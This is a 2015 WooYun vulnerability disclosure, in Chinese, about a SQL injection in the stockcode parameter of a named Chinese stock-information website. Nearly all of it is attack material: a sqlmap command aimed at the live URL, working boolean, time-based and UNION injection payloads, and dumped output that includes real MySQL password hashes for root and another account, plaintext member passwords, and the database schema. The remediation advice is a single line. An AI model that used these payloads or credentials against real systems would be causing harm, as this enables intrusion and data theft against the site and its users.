当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154252

漏洞标题:顶牛股网某处存在SQL注射漏洞(DBA权限+root密码泄露+200W股票信息泄露)

相关厂商:顶牛股

漏洞作者: 路人甲

提交时间:2015-11-19 11:30

修复时间:2016-01-11 15:34

公开时间:2016-01-11 15:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

顶牛股网某处存在SQL注射漏洞(DBA权限+root密码泄露+200W股票信息泄露)

详细说明:

地址:http://www.dingniugu.com/ddeLine.php?stockcode=601111

python sqlmap.py -u "http://www.dingniugu.com/ddeLine.php?stockcode=601111" -p stockcode --technique=BTU --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


Database: scms
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ddedata                               | 2068057 |


Database: scms
Table: ddedata
[30 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| time     | varchar(20) |
| bb       | varchar(20) |
| cjgs     | varchar(20) |
| cjl      | varchar(20) |
| code     | varchar(20) |
| dat      | varchar(20) |
| ddmc     | varchar(20) |
| ddmr     | varchar(20) |
| ddx      | varchar(20) |
| ddy      | varchar(20) |
| ddz      | varchar(20) |
| dsmc     | varchar(20) |
| dsmr     | varchar(20) |
| ff       | varchar(20) |
| hh       | varchar(20) |
| Increase | varchar(20) |
| junjia   | varchar(20) |
| kaipan   | varchar(20) |
| ltgs     | varchar(20) |
| price    | varchar(20) |
| shoupan  | varchar(20) |
| tdmc     | varchar(20) |
| tdmr     | varchar(20) |
| xdmc     | varchar(20) |
| xdmr     | varchar(20) |
| zml      | varchar(20) |
| zmml     | varchar(20) |
| zs       | varchar(20) |
| zuidi    | varchar(20) |
| zuigao   | varchar(20) |
+----------+-------------+

漏洞证明:

---
Parameter: stockcode (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: stockcode=601111' AND 8684=8684 AND 'Pobi'='Pobi
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: stockcode=601111' AND (SELECT * FROM (SELECT(SLEEP(5)))FOJq) AND 'OAgX'='OAgX
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: stockcode=-7552' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b7871,0x7a624d646e6e545057744578744c456e42555a7a764f7667466f76434f77736556525050526e4354,0x71787a6b71)-- -
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, PHP 5.2.5
back-end DBMS: MySQL 5.0.12
current user:    'root@localhost'
current user is DBA:    True
database management system users [2]:
[*] 'dingniugubbs'@'58.64.150.175'
[*] 'root'@'localhost'
database management system users password hashes:
[*] dingniugubbs [1]:
    password hash: *371C0BA5302BB7C0CA17B74D106DB595839497F3
[*] root [1]:
    password hash: *EE4A8CAEFA3CF6FD89EA134107E2D6A2755AAAB2
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 461     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126     |
| COLLATIONS                            | 126     |
| STATISTICS                            | 73      |
| KEY_COLUMN_USAGE                      | 54      |
| TABLES                                | 48      |
| CHARACTER_SETS                        | 36      |
| TABLE_CONSTRAINTS                     | 34      |
| USER_PRIVILEGES                       | 26      |
| SCHEMA_PRIVILEGES                     | 16      |
| SCHEMATA                              | 3       |
+---------------------------------------+---------+
Database: scms
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ddedata                               | 2068057 |
| golddata                              | 81162   |
| art                                   | 27753   |
| bestgourl                             | 3026    |
| ziliao                                | 2810    |
| yjyg                                  | 2627    |
| nbyj                                  | 2482    |
| bk                                    | 2458    |
| bankcon                               | 781     |
| rmb                                   | 183     |
| bank                                  | 152     |
| bankll                                | 7       |
| userzxg                               | 3       |
| member                                | 2       |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| help_relation                         | 825     |
| help_topic                            | 475     |
| help_keyword                          | 401     |
| help_category                         | 36      |
| `user`                                | 2       |
| db                                    | 1       |
| func                                  | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: scms
Table: member
[1 column]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| member_password | varchar(32) |
+-----------------+-------------+
Database: mysql
Table: user
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| Password | char(41) |
+----------+----------+
Database: scms
Table: member
[2 entries]
+-----------------+
| member_password |
+-----------------+
| 666666          |
| 837400          |
+-----------------+
Database: mysql
Table: user
[2 entries]
+-------------------------------------------+
| Password                                  |
+-------------------------------------------+
| *371C0BA5302BB7C0CA17B74D106DB595839497F3 |
| *EE4A8CAEFA3CF6FD89EA134107E2D6A2755AAAB2 |
+-------------------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stockcode (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: stockcode=601111' AND 8684=8684 AND 'Pobi'='Pobi
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: stockcode=601111' AND (SELECT * FROM (SELECT(SLEEP(5)))FOJq) AND 'OAgX'='OAgX
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: stockcode=-7552' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b7871,0x7a624d646e6e545057744578744c456e42555a7a764f7667466f76434f77736556525050526e4354,0x71787a6b71)-- -
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, PHP 5.2.5
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] mysql
[*] scms
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stockcode (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: stockcode=601111' AND 8684=8684 AND 'Pobi'='Pobi
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: stockcode=601111' AND (SELECT * FROM (SELECT(SLEEP(5)))FOJq) AND 'OAgX'='OAgX
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: stockcode=-7552' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b7871,0x7a624d646e6e545057744578744c456e42555a7a764f7667466f76434f77736556525050526e4354,0x71787a6b71)-- -
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, PHP 5.2.5
back-end DBMS: MySQL 5.0.12
Database: scms
Table: ddedata
[30 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| time     | varchar(20) |
| bb       | varchar(20) |
| cjgs     | varchar(20) |
| cjl      | varchar(20) |
| code     | varchar(20) |
| dat      | varchar(20) |
| ddmc     | varchar(20) |
| ddmr     | varchar(20) |
| ddx      | varchar(20) |
| ddy      | varchar(20) |
| ddz      | varchar(20) |
| dsmc     | varchar(20) |
| dsmr     | varchar(20) |
| ff       | varchar(20) |
| hh       | varchar(20) |
| Increase | varchar(20) |
| junjia   | varchar(20) |
| kaipan   | varchar(20) |
| ltgs     | varchar(20) |
| price    | varchar(20) |
| shoupan  | varchar(20) |
| tdmc     | varchar(20) |
| tdmr     | varchar(20) |
| xdmc     | varchar(20) |
| xdmr     | varchar(20) |
| zml      | varchar(20) |
| zmml     | varchar(20) |
| zs       | varchar(20) |
| zuidi    | varchar(20) |
| zuigao   | varchar(20) |
+----------+-------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝